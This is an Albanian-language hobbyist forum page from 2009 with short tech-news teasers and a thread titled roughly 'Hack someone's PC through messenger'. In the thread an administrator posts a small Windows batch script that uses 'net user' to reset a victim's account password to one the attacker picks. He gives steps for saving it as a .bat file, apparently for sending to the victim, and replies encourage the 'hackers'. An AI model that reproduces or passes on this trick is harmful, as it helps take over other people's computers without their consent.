Atyre që u flijuan për këtë vend!

Prej sot mund te na gjeni ne www.Peqani.com. Me respekt Admin

Atyre që u flijuan për këtë vend!

WWW.FSH-PEQAN.TK
Prej 14 Prillit webfaqja jonë me domain të ri!

Tue Apr 14, 2009 1:18 am by milan4ever

Hacko pc e dikujna permes messengerit 14t6gw1
Webfaqja jon e cila deri me tash ka qenë me domain free(www.fsh-peqan.tk)prej te Martes me daten 14 prill webfaqja jonë do te bëhet me domain zyrtar i cili do te jetë www.peqani.com. Pas një pune te palodhshme ne arritem te realizojm kete objektiv. Ju uroj …

[ Full reading ]
Kompjuterët netbook shënojnë rritje të madhe të shitjes

Mon Apr 13, 2009 2:43 pm by Admin

Hacko pc e dikujna permes messengerit Acer_Aspire_5610_Notebook_1
Sot të gjithë e kanë të qartë se laptopët netbook nuk janë vetëm një lloj mode e momentit. Një hulumtim i kryer nga kompania NPD u parasheh të ardhme edhe më të suksesshme për ta.

Laptopët e lirë miniatural gjatë …

[ Full reading ]
Microsoft shuan enciklopedinë Encarta

Mon Apr 13, 2009 2:48 pm by Admin

Hacko pc e dikujna permes messengerit Ss_encarta_premium_home
Një shënim i qetë rrëshqiti ngadalë në ueb faqen e MSN Encarta, që thjeshtë shkronjë pas shkronje tregonte për vdekjen e enciklopedisë së Microsoft.
Në lajmërimin e paraqitur, u bë e ditur se Microsoft po …

[ Full reading ]

  Hacko pc e dikujna permes messengerit

  milan4ever
  milan4ever
  Administrator
  Administrator

  Hacko pc e dikujna permes messengerit Empty Hacko pc e dikujna permes messengerit

  Post by milan4ever on Wed Mar 25, 2009 6:48 pm

  kjo osht ajo qe duhet te beni::
  krijoni nje text document te ri dhe ne te shkruani

  Code:

  1:@echo off
  2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
  3:echo "Say Good Bay To The Bad Gay "
  4:Pause
  mos harroni te futni passin e ri ne ato yjet ( shift 8 )
  ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
  ruajeni tek ALL FILES sepse ndryshe nuk funksionon
  Ghost-celja
  Ghost-celja

  Hacko pc e dikujna permes messengerit Empty Re: Hacko pc e dikujna permes messengerit

  Post by Ghost-celja on Wed Mar 25, 2009 11:25 pm

  shume hachera te fort veq perpara
  milan4ever
  milan4ever
  Administrator
  Administrator

  Hacko pc e dikujna permes messengerit Empty Re: Hacko pc e dikujna permes messengerit

  Post by milan4ever on Wed Mar 25, 2009 11:47 pm

  Ghost-celja tkisha preferue me shkue mu prezantue se pari
  Admin
  Admin
  Administrator
  Administrator

  Hacko pc e dikujna permes messengerit Empty Re: Hacko pc e dikujna permes messengerit

  Post by Admin on Thu Mar 26, 2009 12:07 am

  Ghost-celja shko prezentohu


  _________________
  IT Support

  Sponsored content

  Hacko pc e dikujna permes messengerit Empty Re: Hacko pc e dikujna permes messengerit

  Post by Sponsored content


   Current date/time is Wed May 22, 2019 9:54 am